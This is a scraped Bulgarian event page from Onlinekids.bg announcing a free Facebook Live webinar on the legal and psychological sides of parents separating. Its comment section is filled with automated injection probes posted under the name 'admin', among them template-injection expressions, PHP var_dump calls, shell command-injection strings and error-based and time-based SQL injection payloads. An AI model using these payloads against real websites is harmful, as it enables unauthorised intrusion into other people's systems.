Onlinekids

Разделени И заедно - правни и психологически аспекти

1 наум


14 Дек I 14:00 ч.  петък I 2023 Виж други дати

еднократна среща

За родители

родители

Препоръчителна възраст

-

Продължителност на срещата

-

Големина на групата

безплатно

Описание

Решението за раздяла, когато има деца, може да бъде сложен и емоционално предизвикателен процес както за родителите, така и за децата. Въпреки че ситуацията във всяко семейство е уникална, има някои общи правни и психологически аспекти, които хората трябва да вземат предвид, за да се ориентират, когато преминават през развод и раздяла.
В уебинара ще говорим за това как да направим план преди да предприемем действия, който включва това, как да съхраним емоционалното състояние на нас като родители, и най-вече на децата. Ще дискутираме какви са правните аспекти на раздялата, и какви права имаме като родители. Ще разгледаме и случаи, в които нямаме брак, но бихме искали да имаме одобрен режим на виждане. И не на последно място, кога и как се дължи издръжка.
Лектори: Антоанета Атанасова, консултант по кризисни отношения, раздяла и развод
Биляна Котева, основател на 1 наум
Вход: свободен

Срещата ще се провежда на живо с Facebook LIVE на страницата на 1 наум - https://www.facebook.com/1naum

 • Коментари

  admin

  6.12.23 г., 15:12 ч.

  123456

  admin

  6.12.23 г., 15:13 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  /*1*/{{926456291+961110950}}

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  ${966323243+883718116}

  admin

  6.12.23 г., 15:16 ч.

  ${@var_dump(md5(386491042))};

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:16 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  ${(931821108+869450653)?c}

  admin

  6.12.23 г., 15:17 ч.

  '-var_dump(md5(400114688))-'

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  #set($c=896280824+843214314)${c}$c

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  ${863008951+994507544}

  admin

  6.12.23 г., 15:17 ч.

  <%- 900970400+902338417 %>

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  ${997104615+860887487}

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin expr 872897349 + 956450467

  6.12.23 г., 15:17 ч.

  123456

  ${@var_dump(md5(223065049))};

  6.12.23 г., 15:17 ч.

  123456

  admin|expr 948531526 + 810914100

  6.12.23 г., 15:17 ч.

  123456

  '-var_dump(md5(245419222))-'

  6.12.23 г., 15:17 ч.

  123456

  admin$(expr 827005252 + 989283630)

  6.12.23 г., 15:17 ч.

  123456

  admin&set /A 843575046+936769468

  6.12.23 г., 15:17 ч.

  123456

  expr 994671279 + 829658732

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456
  expr 829159421 + 833278935

  admin

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456|expr 998813266 + 989773690

  /*1*/{{915128827+805206249}}

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456$(expr 899174803 + 994655693)

  ${835764796+910075551}

  6.12.23 г., 15:17 ч.

  123456

  extractvalue(1,concat(char(126),md5(1443801284)))

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  123456&set /A 806007508+954605702

  ${(958129753+893501416)?c}

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:17 ч.

  expr 847819056 + 900510236

  #set($c=962484697+976274231)${c}$c

  6.12.23 г., 15:17 ч.

  123456

  admin/**/and/**/cast(md5('1578600154')as/**/int)>0

  6.12.23 г., 15:17 ч.

  123456

  <%- 881641559+801501769 %>

  6.12.23 г., 15:17 ч.

  123456

  admin鎈'"\(

  6.12.23 г., 15:17 ч.

  123456

  admin'"\(

  6.12.23 г., 15:17 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456
  expr 876810066 + 945571230

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  ${@var_dump(md5(295859214))};

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456|expr 931255835 + 838909792

  admin

  6.12.23 г., 15:20 ч.

  '-var_dump(md5(967277215))-'

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456$(expr 933586550 + 980953656)

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456'and/**/extractvalue(1,concat(char(126),md5(1522862567)))and'

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456&set /A 850908989+824660784

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456"and/**/extractvalue(1,concat(char(126),md5(1605543124)))and"

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  expr 843839578 + 878539737

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  extractvalue(1,concat(char(126),md5(1042853792)))

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456'and(select'1'from/**/cast(md5(1004739148)as/**/int))>'0

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456/**/and/**/cast(md5('1295227277')as/**/int)>0

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1958848891')))

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  ${907770129+852638501}

  ${@var_dump(md5(853394336))};

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1868155671')))>'0

  admin

  6.12.23 г., 15:20 ч.

  123456

  '-var_dump(md5(626841641))-'

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456鎈'"\(

  admin

  6.12.23 г., 15:20 ч.

  123456

  admin

  6.12.23 г., 15:20 ч.

  123456'"\(

  admin

  6.12.23 г., 15:20 ч.

  123456

  /*1*/{{840553259+879117858}}

  6.12.23 г., 15:20 ч.

  123456

  ${858084010+802422629}

  6.12.23 г., 15:20 ч.

  123456

  ${852650327+878145318}

  6.12.23 г., 15:20 ч.

  123456

  ${(953455855+954626617)?c}

  6.12.23 г., 15:21 ч.

  123456

  #set($c=919679100+999604603)${c}$c

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  <%- 818585109+913644555 %>

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin'and'v'='v

  6.12.23 г., 15:21 ч.

  123456

  admin expr 934932320 + 855684057

  6.12.23 г., 15:21 ч.

  123456

  admin'and't'='o

  6.12.23 г., 15:21 ч.

  123456

  admin|expr 977801548 + 909752111

  6.12.23 г., 15:21 ч.

  123456

  admin"and"u"="u

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  /*1*/{{958839001+811015465}}

  admin$(expr 895470593 + 948463651)

  6.12.23 г., 15:21 ч.

  123456

  admin"and"a"="e

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  ${969666709+959775634}

  admin&set /A 850528006+874160880

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  ${(853168221+853261150)?c}

  expr 854908337 + 872868201

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  #set($c=883651387+953587283)${c}$c

  admin

  6.12.23 г., 15:21 ч.

  <%- 849381811+988572413 %>

  admin'and(select+1)>0waitfor/**/delay'0:0:0

  6.12.23 г., 15:21 ч.

  123456

  admin'and(select+1)>0waitfor/**/delay'0:0:2

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:21 ч.

  123456

  admin

  6.12.23 г., 15:22 ч.

  123456

  admin

  6.12.23 г., 15:22 ч.

  123456

  admin

  6.12.23 г., 15:22 ч.

  123456

  extractvalue(1,concat(char(126),md5(1966025417)))

  6.12.23 г., 15:22 ч.

  123456

  admin/**/and/**/cast(md5('1579046871')as/**/int)>0

  6.12.23 г., 15:22 ч.

  123456

  admin鎈'"\(

  6.12.23 г., 15:22 ч.

  123456

  admin'"\(

  6.12.23 г., 15:22 ч.

  123456

  admin

  6.12.23 г., 15:23 ч.

  123456/**/and+2=2

  admin

  6.12.23 г., 15:23 ч.

  123456/**/and+3=8

  admin

  6.12.23 г., 15:23 ч.

  123456'and'e'='e

  admin

  6.12.23 г., 15:23 ч.

  123456'and't'='d

  admin

  6.12.23 г., 15:23 ч.

  123456"and"b"="b

  admin

  6.12.23 г., 15:23 ч.

  123456"and"r"="y

  admin

  6.12.23 г., 15:23 ч.

  (select*from(select+sleep(0)union/**/select+1)a)

  admin

  6.12.23 г., 15:23 ч.

  (select*from(select+sleep(2)union/**/select+1)a)

  admin

  6.12.23 г., 15:23 ч.

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

  admin

  6.12.23 г., 15:23 ч.

  123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

  admin

  6.12.23 г., 15:23 ч.

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

  admin

  6.12.23 г., 15:24 ч.

  123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

  admin

  6.12.23 г., 15:24 ч.

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

  admin

  6.12.23 г., 15:24 ч.

  123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

  admin

  6.12.23 г., 15:24 ч.

  123456'and(select+1)>0waitfor/**/delay'0:0:0

  admin

  6.12.23 г., 15:24 ч.

  123456'and(select+1)>0waitfor/**/delay'0:0:2

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('z',0)

  admin

  6.12.23 г., 15:24 ч.

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('w',2)

  admin

  6.12.23 г., 15:24 ч.

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l

  admin

  6.12.23 г., 15:24 ч.

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',2)='e

  Коментирай

  Тук може да оставите коментар след като сте взели участие в курса или срещата. Този коментар ще помогне на други потребители да решат дали да се запишат за тази среща или не. Вашият имейл няма да бъде публикуван.

  * Запознат съм и приемам Общите условия и Политиката за защита на личните данни на пларформата Onlinekids.bg

  Полетата със * са задължителни.

1 наум

Попитай

Попитай

Тук може да изпратите съобщение на организатора на срещата. Ще получите отговор на подадения от Вас електронен адрес (email). Ако искате да се свържете с Onlinekids.bg, моля използвайте формата за контакт.

* Запознат съм и приемам Общите условия и Политиката за защита на личните данни на пларформата Onlinekids.bg

Полетата със * са задължителни.